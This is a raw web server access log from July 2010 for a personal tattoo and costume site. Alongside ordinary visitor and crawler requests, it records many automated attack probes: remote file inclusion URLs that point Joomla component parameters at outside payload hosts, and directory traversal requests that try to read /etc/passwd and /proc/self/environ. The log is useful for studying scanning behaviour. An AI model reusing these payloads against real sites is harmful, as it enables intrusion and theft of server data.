210.240.26.129 - - [09/Jul/2010:04:32:37 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.831"
210.240.26.129 - - [09/Jul/2010:04:32:38 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.831"
89.108.64.192 - - [09/Jul/2010:04:53:30 -0500] "GET /logs/access_log.1277510400///components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.812"
89.108.64.192 - - [09/Jul/2010:04:53:30 -0500] "GET ///components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.812"
89.108.64.192 - - [09/Jul/2010:04:53:31 -0500] "GET /logs///components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.812"
67.195.112.232 - - [09/Jul/2010:04:56:30 -0500] "GET /logs/access_log.1188864000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.183 - - [09/Jul/2010:05:01:39 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.71.179 - - [09/Jul/2010:05:03:33 -0500] "GET /tattoo/set2.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.250.255.243 - - [09/Jul/2010:05:05:45 -0500] "GET /logs/access_log.1225238400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
208.80.193.27 - - [09/Jul/2010:05:33:56 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {588C991A-1C07-FD19-35B9-C3ADE249BD85}; .NET CLR 1.1.4322)"
189.126.107.118 - - [09/Jul/2010:05:37:32 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.cobrap.org.br/documentos/myid.jpg? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
207.46.199.185 - - [09/Jul/2010:05:38:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [09/Jul/2010:05:42:08 -0500] "GET /logs/access_log.1260921600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.123.169.247 - - [09/Jul/2010:05:48:05 -0500] "GET /logs/access_log.1229644800 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1229644800""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50"
178.123.169.247 - - [09/Jul/2010:05:48:05 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50"
64.207.204.37 - - [09/Jul/2010:05:53:12 -0500] "GET /logs/access_log.1276041600//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
64.207.204.37 - - [09/Jul/2010:05:53:12 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
64.207.204.37 - - [09/Jul/2010:05:53:12 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
64.207.204.37 - - [09/Jul/2010:05:53:12 -0500] "GET /logs/access_log.1276214400//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
67.195.112.232 - - [09/Jul/2010:05:54:55 -0500] "GET /costume/ HTTP/1.0" 200 - "http://www.ringsworld.com/history/6-previous.html""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.13.198.94 - - [09/Jul/2010:05:56:34 -0500] "GET / HTTP/1.1" 200 1003 "-""Java/1.6.0_16"
75.125.254.98 - - [09/Jul/2010:06:03:15 -0500] "GET /logs/?option=com_extended_registration&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 12637 "-""libwww-perl/5.834"
75.125.254.98 - - [09/Jul/2010:06:03:15 -0500] "GET /?option=com_extended_registration&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
75.125.254.98 - - [09/Jul/2010:06:04:13 -0500] "GET /logs/?option=com_extended_registration&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 12637 "-""libwww-perl/5.834"
75.125.254.98 - - [09/Jul/2010:06:04:14 -0500] "GET /?option=com_extended_registration&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
202.169.224.34 - - [09/Jul/2010:06:15:12 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.210.212.120 - - [09/Jul/2010:06:17:51 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.nl/search?q=earl+brown+tattoo+flash&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:nl:official&client=firefox-a""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:17:51 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:17:54 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:17:56 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:17 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:17 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:17 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:17 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:17 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:17 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:17 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:18 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:18 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:18 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:18 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:48 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:48 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:48 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:48 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:48 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:48 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:48 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:48 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:49 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:49 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
94.210.212.120 - - [09/Jul/2010:06:18:49 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
202.169.224.34 - - [09/Jul/2010:06:21:07 -0500] "GET /logs/access_log.1276732800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
202.169.224.34 - - [09/Jul/2010:06:21:08 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
202.169.224.34 - - [09/Jul/2010:06:21:09 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
202.169.224.34 - - [09/Jul/2010:06:21:09 -0500] "GET /logs/access_log.1276819200/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
180.72.42.68 - - [09/Jul/2010:06:23:07 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FBSMTWB; InfoPath.2)"
180.72.42.68 - - [09/Jul/2010:06:23:08 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FBSMTWB; InfoPath.2)"
189.126.107.118 - - [09/Jul/2010:06:27:27 -0500] "GET /logs/access_log.1276732800/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.cobrap.org.br/documentos/myid.jpg? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
189.126.107.118 - - [09/Jul/2010:06:27:28 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.cobrap.org.br/documentos/myid.jpg? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
189.126.107.118 - - [09/Jul/2010:06:27:28 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.cobrap.org.br/documentos/myid.jpg? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
67.195.112.232 - - [09/Jul/2010:06:29:28 -0500] "GET /logs/access_log.1186012800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
189.126.107.118 - - [09/Jul/2010:06:30:57 -0500] "GET /logs/access_log.1277424000/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.cobrap.org.br/documentos/myid.jpg? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
74.222.0.45 - - [09/Jul/2010:06:37:06 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.222.0.45 - - [09/Jul/2010:06:37:09 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.195.112.232 - - [09/Jul/2010:06:42:11 -0500] "GET /logs/access_log.1187568000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.222.0.45 - - [09/Jul/2010:06:46:48 -0500] "GET /logs/access_log.1277164800/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.222.0.45 - - [09/Jul/2010:06:46:48 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.222.0.45 - - [09/Jul/2010:06:46:48 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.222.0.45 - - [09/Jul/2010:06:46:51 -0500] "GET /logs/access_log.1277164800/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.222.0.45 - - [09/Jul/2010:06:46:51 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.222.0.45 - - [09/Jul/2010:06:46:51 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.222.0.45 - - [09/Jul/2010:06:47:03 -0500] "GET /logs/access_log.1276041600/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.222.0.45 - - [09/Jul/2010:06:47:05 -0500] "GET /logs/access_log.1276041600/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.195.112.232 - - [09/Jul/2010:06:54:47 -0500] "GET /logs/access_log.1237766400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [09/Jul/2010:07:04:39 -0500] "GET /logs/access_log.1211328000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.71.179 - - [09/Jul/2010:07:15:14 -0500] "GET /logs/access_log.1270944000 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
71.50.199.202 - - [09/Jul/2010:07:18:01 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10"
71.50.199.202 - - [09/Jul/2010:07:18:03 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10"
71.50.199.202 - - [09/Jul/2010:07:18:09 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10"
71.50.199.202 - - [09/Jul/2010:07:18:13 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10"
202.29.92.6 - - [09/Jul/2010:07:28:30 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.29.92.6 - - [09/Jul/2010:07:28:41 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.232 - - [09/Jul/2010:07:34:51 -0500] "GET /logs/access_log.1233705600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.29.92.6 - - [09/Jul/2010:07:36:53 -0500] "GET /logs/access_log.1275609600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.29.92.6 - - [09/Jul/2010:07:36:53 -0500] "GET /logs/access_log.1275609600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.29.92.6 - - [09/Jul/2010:07:36:54 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.29.92.6 - - [09/Jul/2010:07:36:54 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.29.92.6 - - [09/Jul/2010:07:36:54 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.29.92.6 - - [09/Jul/2010:07:36:54 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
95.211.98.166 - - [09/Jul/2010:07:38:14 -0500] "GET /logs/access_log.1229644800 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1229644800""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01"
95.211.98.166 - - [09/Jul/2010:07:38:14 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01"
202.29.92.6 - - [09/Jul/2010:07:39:19 -0500] "GET /logs/access_log.1276214400//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.29.92.6 - - [09/Jul/2010:07:40:00 -0500] "GET /logs/access_log.1276214400//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.116.128.251 - - [09/Jul/2010:07:43:51 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://www.ravensgard.org/gerekr/costume.html""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB0.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
78.116.128.251 - - [09/Jul/2010:07:43:52 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB0.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
78.116.128.251 - - [09/Jul/2010:07:43:52 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB0.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
78.116.128.251 - - [09/Jul/2010:07:43:53 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB0.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
78.116.128.251 - - [09/Jul/2010:07:43:53 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB0.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
67.195.112.232 - - [09/Jul/2010:07:46:57 -0500] "GET /logs/access_log.1171843200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.44.123.3 - - [09/Jul/2010:07:48:00 -0500] "GET /logs/access_log.1275782400//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
207.46.199.183 - - [09/Jul/2010:07:55:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.61.244.6 - - [09/Jul/2010:08:02:24 -0500] "GET /?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.76"
209.61.244.6 - - [09/Jul/2010:08:02:24 -0500] "GET /?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.76"
72.30.142.216 - - [09/Jul/2010:08:08:08 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [09/Jul/2010:08:08:08 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.34.185.226 - - [09/Jul/2010:08:16:17 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:16:20 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:18:17 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:18:27 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:22:57 -0500] "GET /logs/access_log.1277078400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:22:57 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:22:57 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:23:05 -0500] "GET /logs/access_log.1277078400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:23:05 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:23:05 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
